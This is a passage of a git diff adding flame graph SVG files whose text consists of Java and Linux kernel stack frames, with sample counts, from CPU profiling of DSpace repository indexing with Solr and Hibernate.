samples, 0.23%) + + + +org/apache/commons/dbcp/PoolingConnection$PStmtKey:::hashCode (1 samples, 0.23%) + + + +entry_SYSCALL_64 (22 samples, 5.00%) +entry_.. + + +java/util/AbstractCollection:::toArray (1 samples, 0.23%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::execute (4 samples, 0.91%) + + + +__release_sock (1 samples, 0.23%) + + + +java/util/regex/Pattern$Node:::match (1 samples, 0.23%) + + + +arrayof_jint_fill (1 samples, 0.23%) + + + +update_rq_clock (1 samples, 0.23%) + + + +Reference_Handl (10 samples, 2.27%) +R.. + + +Interpreter (189 samples, 42.95%) +Interpreter + + +itable stub (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +switch_fpu_return (1 samples, 0.23%) + + + +__schedule (18 samples, 4.09%) +__sc.. + + +java/util/regex/Pattern$BmpCharProperty:::match (2 samples, 0.45%) + + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.23%) + + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.23%) + + + +java/lang/String:::toLowerCase (1 samples, 0.23%) + + + +blk_mq_end_request (1 samples, 0.23%) + + + +__perf_event_task_sched_in (16 samples, 3.64%) +__pe.. + + +java/lang/Throwable:::fillInStackTrace (1 samples, 0.23%) + + + +update_load_avg.constprop.0 (1 samples, 0.23%) + + + +[libjvm.so] (2 samples, 0.45%) + + + +do_syscall_64 (1 samples, 0.23%) + + + +java/util/regex/Pattern$GroupHead:::match (2 samples, 0.45%) + + + +java/lang/StackTraceElement:::toString (1 samples, 0.23%) + + + +org/springframework/core/GenericTypeResolver:::doResolveTypeArguments (1 samples, 0.23%) + + + +update_curr (1 samples, 0.23%) + + + +nf_nat_ipv4_local_fn (1 samples, 0.23%) + + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::request (10 samples, 2.27%) +o.. + + +java/util/Properties:::getProperty (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +java/lang/reflect/Proxy$Key1:::equals (1 samples, 0.23%) + + + +__send (47 samples, 10.68%) +__send + + +org/springframework/beans/factory/support/DefaultListableBeanFactory:::getBeansOfType (28 samples, 6.36%) +org/spri.. + + +sun/net/spi/DefaultProxySelector$3:::run (1 samples, 0.23%) + + + +schedule (13 samples, 2.95%) +sc.. 
+ + +[libjvm.so] (1 samples, 0.23%) + + + +java/util/regex/Pattern:::group0 (2 samples, 0.45%) + + + +pthread_cond_wait@@GLIBC_2.3.2 (4 samples, 0.91%) + + + +java/util/regex/Pattern:::sequence (1 samples, 0.23%) + + + +org/apache/http/impl/io/AbstractMessageWriter:::write (1 samples, 0.23%) + + + +org/dspace/browse/BrowseIndex:::getBrowseIndices (6 samples, 1.36%) + + + +java/util/HashMap:::put (1 samples, 0.23%) + + + +[libjvm.so] (2 samples, 0.45%) + + + +org/springframework/core/convert/support/GenericConversionService:::addConverterFactory (1 samples, 0.23%) + + + +java/util/Date:::toString (1 samples, 0.23%) + + + +__check_object_size (1 samples, 0.23%) + + + +org/dspace/core/Context:::init (2 samples, 0.45%) + + + +__schedule (12 samples, 2.73%) +__.. + + +org/dspace/browse/BrowseIndex:::<init> (6 samples, 1.36%) + + + +do_syscall_64 (25 samples, 5.68%) +do_sysc.. + + +entry_SYSCALL_64 (1 samples, 0.23%) + + + +change_protection (1 samples, 0.23%) + + + +futex_wait (17 samples, 3.86%) +fute.. + + +org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::predictBeanType (3 samples, 0.68%) + + + +java/util/regex/Pattern$GroupTail:::match (2 samples, 0.45%) + + + +__schedule (1 samples, 0.23%) + + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (3 samples, 0.68%) + + + +[libjvm.so] (5 samples, 1.14%) + + + +org/dspace/content/Item:::getBundles (4 samples, 0.91%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +org/apache/commons/pool/impl/GenericKeyedObjectPool:::borrowObject (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +tcp_rcv_established (6 samples, 1.36%) + + + +java/util/regex/Pattern:::compile (4 samples, 0.91%) + + + +nf_nat_inet_fn (1 samples, 0.23%) + + + +entry_SYSCALL_64 (1 samples, 0.23%) + + + +nf_conntrack_in (1 samples, 0.23%) + + + +org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (2 samples, 0.45%) + + + +[libjvm.so] (1 samples, 0.23%) + + + +native_write_msr (4 samples, 0.91%) + + + +scheduler_tick (1 samples, 0.23%) + + + +[libjvm.so] (11 samples, 2.50%) +[l.. + + +futex_wait_queue_me (48 samples, 10.91%) +futex_wait_queue.. + + +[libjvm.so] (2 samples, 0.45%) + + + +vtable stub (1 samples, 0.23%) + + + +schedule (25 samples, 5.68%) +schedule + + +futex_wait_queue_me (16 samples, 3.64%) +fute.. 
+ + +do_syscall_64 (48 samples, 10.91%) +do_syscall_64 + + +org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (1 samples, 0.23%) + + + + diff --git a/docs/2020/02/flamegraph-java-cli-dspace64-snapshot.svg b/docs/2020/02/flamegraph-java-cli-dspace64-snapshot.svg new file mode 100644 index 000000000..1d7b64546 --- /dev/null +++ b/docs/2020/02/flamegraph-java-cli-dspace64-snapshot.svg @@ -0,0 +1,4540 @@ + + + + + + + + + + + + + + +Flame Graph + +Reset Zoom +Search +ic + + + +[libjvm.so] (77 samples, 11.39%) +[libjvm.so] + + +[libjvm.so] (3 samples, 0.44%) + + + +java/util/regex/Pattern$Curly:::match (1 samples, 0.15%) + + + +java/util/ArrayList:::iterator (1 samples, 0.15%) + + + +org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (1 samples, 0.15%) + + + +do_softirq_own_stack (6 samples, 0.89%) + + + +__poll (4 samples, 0.59%) + + + +org/apache/solr/client/solrj/request/UpdateRequest:::writeXML (2 samples, 0.30%) + + + +Reference_Handl (11 samples, 1.63%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (7 samples, 1.04%) + + + +__GI___libc_write (1 samples, 0.15%) + + + +org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (3 samples, 0.44%) + + + +ctx_sched_in (1 samples, 0.15%) + + + +[libjvm.so] (1 samples, 0.15%) + + + +org/hibernate/engine/internal/Cascade:::cascade (4 samples, 0.59%) + + + +vtable stub (1 samples, 0.15%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (1 samples, 0.15%) + + + +do_softirq_own_stack (1 samples, 0.15%) + + + +org/apache/commons/configuration/tree/DefaultExpressionEngine:::findNodesForKey (1 samples, 0.15%) + + + +do_syscall_64 (59 samples, 8.73%) +do_syscall_64 + + +java/net/SocketTimeoutException:::<init> (1 samples, 0.15%) + + + +do_syscall_64 (15 samples, 2.22%) +d.. + + +org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.15%) + + + +com/sun/proxy/$Proxy40:::isDirty (17 samples, 2.51%) +co.. + + +sock_def_readable (2 samples, 0.30%) + + + +do_syscall_64 (4 samples, 0.59%) + + + +org/apache/http/impl/client/AbstractHttpClient:::doExecute (3 samples, 0.44%) + + + +org/hibernate/event/internal/FlushVisitor:::processCollection (5 samples, 0.74%) + + + +org/apache/commons/dbcp2/DelegatingPreparedStatement:::executeQuery (1 samples, 0.15%) + + + +org/hibernate/loader/Loader:::initializeEntitiesAndCollections (1 samples, 0.15%) + + + +org/hibernate/internal/SessionImpl:::tryNaturalIdLoadAccess (1 samples, 0.15%) + + + +entry_SYSCALL_64 (2 samples, 0.30%) + + + +java/util/HashMap:::put (1 samples, 0.15%) + + + +org/apache/commons/configuration/tree/DefaultConfigurationKey$KeyIterator:::nextDelimiterPos (1 samples, 0.15%) + + + +entry_SYSCALL_64 (1 samples, 0.15%) + + + +native_write_msr (4 samples, 0.59%) + + + +org/dspace/content/comparator/NameAscendingComparator:::compare (1 samples, 0.15%) + + + +tcp_sendmsg (11 samples, 1.63%) + + + +hrtimer_interrupt (1 samples, 0.15%) + + + +__sys_recvfrom (16 samples, 2.37%) +_.. 
+ + +org/hibernate/event/internal/DefaultSaveOrUpdateEventListener:::onSaveOrUpdate (3 samples, 0.44%) + + + +org/apache/http/protocol/HttpRequestExecutor:::preProcess (2 samples, 0.30%) + + + +nf_hook_slow (3 samples, 0.44%) + + + +do_syscall_64 (1 samples, 0.15%) + + + +sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.15%) + + + +__x64_sys_poll (1 samples, 0.15%) + + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (3 samples, 0.44%) + + + +start_thread (3 samples, 0.44%) + + + +org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (5 samples, 0.74%) + + + +org/apache/http/protocol/HttpRequestExecutor:::execute (3 samples, 0.44%) + + + +start_thread (379 samples, 56.07%) +start_thread + + +org/hibernate/collection/internal/PersistentBag:::beforeInitialize (1 samples, 0.15%) + + + +org/apache/commons/dbcp2/DelegatingConnection:::prepareStatement (1 samples, 0.15%) + + + +itable stub (4 samples, 0.59%) + + + +pthread_cond_wait@@GLIBC_2.3.2 (13 samples, 1.92%) +p.. + + +org/hibernate/persister/entity/AbstractEntityPersister:::selectFragment (1 samples, 0.15%) + + + +org/hibernate/type/CollectionType:::isCollectionType (1 samples, 0.15%) + + + +__ip_queue_xmit (1 samples, 0.15%) + + + +__perf_event_task_sched_in (17 samples, 2.51%) +__.. + + +org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (1 samples, 0.15%) + + + +org/hibernate/type/AbstractStandardBasicType:::isDirty (1 samples, 0.15%) + + + +__wake_up_sync_key (1 samples, 0.15%) + + + +org/dspace/eperson/Group_$$_jvst722_1e:::getHibernateLazyInitializer (1 samples, 0.15%) + + + +java/util/HashMap:::put (1 samples, 0.15%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (4 samples, 0.59%) + + + +[unknown] (17 samples, 2.51%) +[u.. 
+ + +org/hibernate/type/EntityType:::isEntityType (1 samples, 0.15%) + + + +entry_SYSCALL_64 (1 samples, 0.15%) + + + +[libjvm.so] (1 samples, 0.15%) + + + +java/net/SocketInputStream:::socketRead0 (5 samples, 0.74%) + + + +[libjvm.so] (3 samples, 0.44%) + + + +org/hibernate/event/internal/FlushVisitor:::processCollection (2 samples, 0.30%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (1 samples, 0.15%) + + + +[libjvm.so] (1 samples, 0.15%) + + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::request (7 samples, 1.04%) + + + +org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (1 samples, 0.15%) + + + +[libjvm.so] (1 samples, 0.15%) + + + +org/apache/http/cookie/CookieSpecRegistry:::getCookieSpec (1 samples, 0.15%) + + + +org/hibernate/persister/collection/AbstractCollectionPersister:::getElementPersister (1 samples, 0.15%) + + + +java/util/regex/Pattern$GroupHead:::match (1 samples, 0.15%) + + + +org/hibernate/engine/internal/Cascade:::cascade (5 samples, 0.74%) + + + +org/hibernate/type/AbstractStandardBasicType:::isComponentType (1 samples, 0.15%) + + + +java/util/regex/Pattern$BmpCharProperty:::match (1 samples, 0.15%) + + + +org/hibernate/event/internal/DefaultSaveOrUpdateEventListener:::onSaveOrUpdate (1 samples, 0.15%) + + + +org/hibernate/event/internal/DefaultLoadEventListener:::onLoad (2 samples, 0.30%) + + + +org/hibernate/loader/Loader:::loadCollection (7 samples, 1.04%) + + + +org/hibernate/event/internal/FlushVisitor:::processCollection (2 samples, 0.30%) + + + +org/hibernate/internal/SessionImpl:::fireEvict (1 samples, 0.15%) + + + +org/apache/log4j/Category:::forcedLog (1 samples, 0.15%) + + + +org/dspace/discovery/configuration/DiscoverySearchFilter:::getIndexFieldName (1 samples, 0.15%) + + + +java/util/regex/Pattern$Curly:::match (1 samples, 0.15%) + + + +[libjvm.so] (2 samples, 0.30%) + + + +[libjvm.so] (372 samples, 55.03%) +[libjvm.so] + + +org/apache/http/impl/io/AbstractSessionInputBuffer:::fillBuffer (5 samples, 0.74%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::execute (3 samples, 0.44%) + + + +org/dspace/app/util/DailyFileAppender:::subAppend (1 samples, 0.15%) + + + +org/hibernate/loader/criteria/CriteriaLoader:::<init> (2 samples, 0.30%) + + + +org/apache/http/protocol/HttpRequestExecutor:::doSendRequest (2 samples, 0.30%) + + + +java/net/SocketInputStream:::read (5 samples, 0.74%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::isDirty (1 samples, 0.15%) + + + +__schedule (4 samples, 0.59%) + + + +org/apache/commons/configuration/HierarchicalConfiguration:::containsKey (5 samples, 0.74%) + + + +org/springframework/beans/factory/support/DefaultListableBeanFactory:::getBeansOfType (2 samples, 0.30%) + + + +java/util/regex/Pattern$BmpCharProperty:::match (1 samples, 0.15%) + + + +java/util/Arrays:::sort (1 samples, 0.15%) + + + +__schedule (12 samples, 1.78%) + + + +org/hibernate/loader/Loader:::getRowFromResultSet (1 samples, 0.15%) + + + +finish_task_switch (18 samples, 2.66%) +fi.. 
+ + +org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::initializeBean (2 samples, 0.30%) + + + +org/hibernate/type/AbstractStandardBasicType:::isDirty (1 samples, 0.15%) + + + +org/apache/http/impl/conn/ManagedClientConnectionImpl:::isStale (5 samples, 0.74%) + + + +set_task_cpu (1 samples, 0.15%) + + + +tcp_v4_rcv (2 samples, 0.30%) + + + +[libjvm.so] (1 samples, 0.15%) + + + +java/util/regex/Pattern$GroupTail:::match (1 samples, 0.15%) + + + +VM_Periodic_Tas (22 samples, 3.25%) +VM_.. + + +org/apache/log4j/helpers/PatternConverter:::format (1 samples, 0.15%) + + + +native_write_msr (16 samples, 2.37%) +n.. + + +ext4_file_write_iter (1 samples, 0.15%) + + + +org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (2 samples, 0.30%) + + + +itable stub (1 samples, 0.15%) + + + +pthread_cond_timedwait@@GLIBC_2.3.2 (20 samples, 2.96%) +pt.. + + +org/dspace/content/Item_$$_jvst722_4:::getHandle (2 samples, 0.30%) + + + +usb_giveback_urb_bh (1 samples, 0.15%) + + + +[libjvm.so] (78 samples, 11.54%) +[libjvm.so] + + +java/util/ArrayList:::iterator (1 samples, 0.15%) + + + +org/dspace/discovery/SolrServiceImpl:::unIndexContent (7 samples, 1.04%) + + + +__x64_sys_futex (12 samples, 1.78%) + + + +[unknown] (61 samples, 9.02%) +[unknown] + + +org/hibernate/collection/internal/PersistentSet:::toArray (1 samples, 0.15%) + + + +org/dspace/content/comparator/NameAscendingComparator:::compare (1 samples, 0.15%) + + + +[libjvm.so] (2 samples, 0.30%) + + + +itable stub (4 samples, 0.59%) + + + +nf_ct_deliver_cached_events (1 samples, 0.15%) + + + +Interpreter (1 samples, 0.15%) + + + +org/hibernate/internal/SessionImpl:::evict (1 samples, 0.15%) + + + +switch_fpu_return (1 samples, 0.15%) + + + +entry_SYSCALL_64 (34 samples, 5.03%) +entry_.. + + +ktime_get_ts64 (1 samples, 0.15%) + + + +org/hibernate/engine/spi/CascadingAction:::requiresNoCascadeChecking (1 samples, 0.15%) + + + +psi_task_change (1 samples, 0.15%) + + + +pthread_cond_timedwait@@GLIBC_2.3.2 (34 samples, 5.03%) +pthrea.. + + +[libjvm.so] (1 samples, 0.15%) + + + +org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.15%) + + + +org/hibernate/collection/internal/PersistentList:::readFrom (1 samples, 0.15%) + + + +org/apache/http/entity/mime/MultipartEntity:::writeTo (2 samples, 0.30%) + + + +org/apache/http/impl/entity/EntityDeserializer:::doDeserialize (1 samples, 0.15%) + + + +org/dspace/discovery/FullTextContentStreams:::getStream (4 samples, 0.59%) + + + +org/hibernate/type/ManyToOneType:::isDirty (1 samples, 0.15%) + + + +itable stub (1 samples, 0.15%) + + + +jshort_disjoint_arraycopy (1 samples, 0.15%) + + + +org/hibernate/internal/SessionImpl:::listeners (1 samples, 0.15%) + + + +org/apache/commons/configuration/MapConfiguration:::getProperty (1 samples, 0.15%) + + + +__netif_receive_skb_one_core (6 samples, 0.89%) + + + +org/apache/log4j/AppenderSkeleton:::doAppend (3 samples, 0.44%) + + + +_complete_monitor_locking_Java (1 samples, 0.15%) + + + +org/hibernate/internal/SessionImpl:::isDirty (83 samples, 12.28%) +org/hibernate/inte.. + + +org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (2 samples, 0.30%) + + + +org/hibernate/engine/jdbc/internal/ResultSetReturnImpl:::extract (1 samples, 0.15%) + + + +__tcp_push_pending_frames (9 samples, 1.33%) + + + +java/util/AbstractMap:::get (3 samples, 0.44%) + + + +__intel_pmu_enable_all.constprop.0 (32 samples, 4.73%) +__int.. + + +__schedule (18 samples, 2.66%) +__.. 
+ + +org/apache/solr/client/solrj/impl/HttpSolrServer:::request (2 samples, 0.30%) + + + +native_write_msr (16 samples, 2.37%) +n.. + + +finish_task_switch (4 samples, 0.59%) + + + +tasklet_action_common.isra.0 (1 samples, 0.15%) + + + +org/hibernate/engine/internal/Cascade:::cascade (15 samples, 2.22%) +o.. + + +futex_wait_queue_me (18 samples, 2.66%) +fu.. + + +org/apache/log4j/WriterAppender:::subAppend (3 samples, 0.44%) + + + +hrtimer_interrupt (1 samples, 0.15%) + + + +__ip_queue_xmit (8 samples, 1.18%) + + + +timerqueue_add (1 samples, 0.15%) + + + +Java_java_lang_Throwable_fillInStackTrace (1 samples, 0.15%) + + + +__x64_sys_futex (4 samples, 0.59%) + + + +org/hibernate/loader/Loader:::prepareQueryStatement (1 samples, 0.15%) + + + +__schedule (55 samples, 8.14%) +__schedule + + +[libjvm.so] (3 samples, 0.44%) + + + +[libjvm.so] (7 samples, 1.04%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (1 samples, 0.15%) + + + +java/lang/Throwable:::fillInStackTrace (1 samples, 0.15%) + + + +hrtimer_interrupt (1 samples, 0.15%) + + + +sock_sendmsg (12 samples, 1.78%) + + + +org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.15%) + + + +org/hibernate/engine/internal/StatefulPersistenceContext:::reassociateIfUninitializedProxy (2 samples, 0.30%) + + + +org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (40 samples, 5.92%) +org/hib.. + + +syscall_slow_exit_work (1 samples, 0.15%) + + + +JVM_IHashCode (2 samples, 0.30%) + + + +[libjvm.so] (76 samples, 11.24%) +[libjvm.so] + + +org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (6 samples, 0.89%) + + + +org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.15%) + + + +org/apache/solr/client/solrj/request/QueryRequest:::process (2 samples, 0.30%) + + + +itable stub (2 samples, 0.30%) + + + +[libjvm.so] (1 samples, 0.15%) + + + +try_to_wake_up (1 samples, 0.15%) + + + +start_thread (79 samples, 11.69%) +start_thread + + +org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.15%) + + + +java/lang/Throwable$WrappedPrintWriter:::println (1 samples, 0.15%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::flushCollections (1 samples, 0.15%) + + + +org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (54 samples, 7.99%) +org/hiberna.. + + +sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.15%) + + + +entry_SYSCALL_64 (60 samples, 8.88%) +entry_SYSCAL.. 
[flame graph SVG text omitted: remainder of a 676-sample CPU flame graph of DSpace Solr indexing; the widest frames are org/dspace/core/Context:::uncacheEntity and org/dspace/core/HibernateDBConnection:::uncacheEntity (~33%), org/dspace/discovery/SolrServiceImpl:::indexContent (~22%) and :::buildDocument (~21%), with much of the remainder in Hibernate flush and dirty-check frames such as org/hibernate/internal/SessionImpl:::isDirty]
diff --git a/docs/2020/02/out.dspace510-3.svg b/docs/2020/02/out.dspace510-3.svg new file mode 100644 index 000000000..a96d21a67 --- /dev/null +++ b/docs/2020/02/out.dspace510-3.svg @@ -0,0 +1,2628 @@
[flame graph SVG text omitted: "Flame Graph" (out.dspace510-3.svg), a 209-sample CPU profile whose widest application frames are org/dspace/discovery/SolrServiceImpl:::indexContent (~62%), org/dspace/browse/SolrBrowseCreateDAO:::additionalIndex (~9%), and the Solr HTTP request path through org/apache/solr/client/solrj/impl/HttpSolrServer and the Apache HttpClient stack]
+ + +org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (1 samples, 0.48%) + + + +org/dspace/storage/rdbms/TableRowIterator:::<init> (2 samples, 0.96%) + + + +[unknown] (1 samples, 0.48%) + + + +Interpreter (134 samples, 64.11%) +Interpreter + + +__libc_recv (20 samples, 9.57%) +__libc_recv + + +org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (2 samples, 0.96%) + + + +org/apache/http/impl/AbstractHttpClientConnection:::isStale (1 samples, 0.48%) + + + +org/apache/http/impl/entity/EntitySerializer:::serialize (1 samples, 0.48%) + + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::request (10 samples, 4.78%) +org/a.. + + +rb_insert_color (1 samples, 0.48%) + + + +JVM_FillInStackTrace (2 samples, 0.96%) + + + +__softirqentry_text_start (5 samples, 2.39%) +_.. + + +org/apache/http/impl/conn/ProxySelectorRoutePlanner:::determineProxy (1 samples, 0.48%) + + + +[libjvm.so] (1 samples, 0.48%) + + + +Java_java_lang_Throwable_fillInStackTrace (2 samples, 0.96%) + + + +org/dspace/content/DSpaceObject$MetadataCache:::get (4 samples, 1.91%) +o.. + + +org/apache/http/impl/client/DefaultRequestDirector:::execute (8 samples, 3.83%) +org/.. + + +org/apache/http/impl/io/AbstractSessionInputBuffer:::fillBuffer (1 samples, 0.48%) + + + +enqueue_hrtimer (1 samples, 0.48%) + + + +entry_SYSCALL_64_after_hwframe (20 samples, 9.57%) +entry_SYSCALL.. + + +ip_local_deliver (3 samples, 1.44%) + + + +sun/nio/cs/UTF_8$Decoder:::decode (1 samples, 0.48%) + + + +entry_SYSCALL_64_after_hwframe (24 samples, 11.48%) +entry_SYSCALL_64_.. + + +ext4_file_write_iter (1 samples, 0.48%) + + + +org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (1 samples, 0.48%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.96%) + + + +deactivate_task (1 samples, 0.48%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::determineRoute (1 samples, 0.48%) + + + +sock_sendmsg (18 samples, 8.61%) +sock_sendmsg + + +JVM_InvokeMethod (134 samples, 64.11%) +JVM_InvokeMethod + + +java/lang/Throwable:::fillInStackTrace (2 samples, 0.96%) + + + +org/apache/http/impl/conn/ManagedClientConnectionImpl:::isStale (1 samples, 0.48%) + + + +java/lang/String:::equals (1 samples, 0.48%) + + + +org/apache/http/entity/mime/AbstractMultipartForm:::doWriteTo (12 samples, 5.74%) +org/apa.. + + +org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::predictBeanType (3 samples, 1.44%) + + + +org/dspace/browse/SolrBrowseCreateDAO:::<init> (1 samples, 0.48%) + + + +org/apache/http/impl/conn/ManagedClientConnectionImpl:::isStale (4 samples, 1.91%) +o.. + + +finish_task_switch (24 samples, 11.48%) +finish_task_switch + + +org/apache/commons/logging/LogFactory$1:::run (2 samples, 0.96%) + + + +java/net/SocketInputStream:::read (4 samples, 1.91%) +j.. + + +org/springframework/beans/factory/support/AbstractBeanFactory:::getMergedLocalBeanDefinition (2 samples, 0.96%) + + + +schedule (17 samples, 8.13%) +schedule + + +skb_copy_datagram_iter (2 samples, 0.96%) + + + +org/apache/log4j/helpers/PatternConverter:::format (1 samples, 0.48%) + + + +org/dspace/content/ItemIterator:::nextByRow (2 samples, 0.96%) + + + +java/util/regex/Pattern$Curly:::match (1 samples, 0.48%) + + + +arrayof_jint_fill (1 samples, 0.48%) + + + +org/apache/http/protocol/HttpRequestExecutor:::doReceiveResponse (1 samples, 0.48%) + + + +[libjvm.so] (4 samples, 1.91%) +[.. 
+ + +org/apache/http/client/utils/URIBuilder:::buildString (1 samples, 0.48%) + + + +org/apache/log4j/WriterAppender:::subAppend (3 samples, 1.44%) + + + +Interpreter (134 samples, 64.11%) +Interpreter + + +java/util/regex/Pattern$GroupHead:::match (1 samples, 0.48%) + + + +org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (9 samples, 4.31%) +org/a.. + + +update_process_times (1 samples, 0.48%) + + + +org/postgresql/core/v3/QueryExecutorImpl:::sendBind (1 samples, 0.48%) + + + +org/apache/commons/logging/LogFactory:::getFactory (5 samples, 2.39%) +o.. + + +org/dspace/servicemanager/spring/SpringServiceManager:::getServicesByType (12 samples, 5.74%) +org/dsp.. + + +org/apache/solr/client/solrj/request/AbstractUpdateRequest:::process (8 samples, 3.83%) +org/.. + + +java/lang/reflect/Proxy:::newProxyInstance (1 samples, 0.48%) + + + +nft_do_chain_inet (1 samples, 0.48%) + + + +dequeue_entity (1 samples, 0.48%) + + + +__ip_queue_xmit (14 samples, 6.70%) +__ip_queu.. + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.96%) + + + +org/dspace/storage/rdbms/TableRowIterator:::next (3 samples, 1.44%) + + + +[libjvm.so] (1 samples, 0.48%) + + + +java/util/HashMap:::resize (1 samples, 0.48%) + + + +org/dspace/storage/rdbms/TableRowIterator:::next (1 samples, 0.48%) + + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.48%) + + + +do_sys_poll (2 samples, 0.96%) + + + +[libjvm.so] (4 samples, 1.91%) +[.. + + +java/security/AccessController:::doPrivileged (3 samples, 1.44%) + + + +org/dspace/content/Bundle:::<init> (7 samples, 3.35%) +org.. + + +schedule_hrtimeout_range_clock (1 samples, 0.48%) + + + +java/util/TimSort:::countRunAndMakeAscending (1 samples, 0.48%) + + + +org/apache/http/impl/AbstractHttpClientConnection:::receiveResponseHeader (1 samples, 0.48%) + + + +do_softirq.part.0 (5 samples, 2.39%) +d.. + + +org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.48%) + + + +dequeue_entity (1 samples, 0.48%) + + + +org/apache/http/impl/client/DefaultRequestDirector:::execute (14 samples, 6.70%) +org/apach.. + + +org/apache/http/impl/conn/ManagedClientConnectionImpl:::isStale (4 samples, 1.91%) +o.. + + +__intel_pmu_enable_all.constprop.0 (24 samples, 11.48%) +__intel_pmu_enabl.. + + +org/apache/http/protocol/RequestTargetHost:::process (1 samples, 0.48%) + + + +pthread_cond_wait@@GLIBC_2.3.2 (24 samples, 11.48%) +pthread_cond_wait.. + + +java/net/SocketTimeoutException:::<init> (2 samples, 0.96%) + + + +entry_SYSCALL_64_after_hwframe (1 samples, 0.48%) + + + +org/apache/solr/client/solrj/request/AbstractUpdateRequest:::process (14 samples, 6.70%) +org/apach.. + + +org/springframework/core/env/StandardEnvironment:::customizePropertySources (10 samples, 4.78%) +org/s.. + + +scheduler_tick (1 samples, 0.48%) + + + +java/util/HashMap:::get (1 samples, 0.48%) + + + +org/apache/http/impl/DefaultConnectionReuseStrategy:::keepAlive (1 samples, 0.48%) + + + +[libjvm.so] (4 samples, 1.91%) +[.. + + +do_syscall_64 (1 samples, 0.48%) + + + +org/apache/http/impl/io/AbstractSessionInputBuffer:::fillBuffer (1 samples, 0.48%) + + + +sun/net/spi/DefaultProxySelector:::select (1 samples, 0.48%) + + + +net_rx_action (5 samples, 2.39%) +n.. + + +__netif_receive_skb (5 samples, 2.39%) +_.. + + +ip_rcv_finish (3 samples, 1.44%) + + + +org/dspace/storage/rdbms/DatabaseManager:::findByUnique (1 samples, 0.48%) + + + +org/dspace/discovery/SolrServiceImpl:::requiresIndexing (11 samples, 5.26%) +org/ds.. 
+ + +org/apache/commons/pool/impl/GenericKeyedObjectPool:::borrowObject (1 samples, 0.48%) + + + +ip_local_deliver_finish (3 samples, 1.44%) + + + +ipv4_conntrack_local (2 samples, 0.96%) + + + +[libjvm.so] (2 samples, 0.96%) + + + +org/apache/solr/client/solrj/SolrRequest:::getPath (1 samples, 0.48%) + + + +java/util/regex/Pattern$GroupTail:::match (1 samples, 0.48%) + + + +org/dspace/content/DSpaceObject:::getMetadata (4 samples, 1.91%) +o.. + + +hrtimer_start_range_ns (1 samples, 0.48%) + + + +org/apache/http/impl/entity/EntitySerializer:::serialize (13 samples, 6.22%) +org/apac.. + + +jbyte_disjoint_arraycopy (1 samples, 0.48%) + + + +[libjvm.so] (2 samples, 0.96%) + + + +org/apache/solr/client/solrj/util/ClientUtils:::writeXML (7 samples, 3.35%) +org.. + + +java/util/regex/Pattern$BmpCharProperty:::match (2 samples, 0.96%) + + + +org/apache/log4j/WriterAppender:::append (1 samples, 0.48%) + + + +vtable stub (1 samples, 0.48%) + + + +org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.48%) + + + +__vfprintf_internal (1 samples, 0.48%) + + + +org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (5 samples, 2.39%) +o.. + + +java/lang/String:::toLowerCase (2 samples, 0.96%) + + + +__kmalloc_reserve.isra.0 (1 samples, 0.48%) + + + +org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (13 samples, 6.22%) +org/apac.. + + 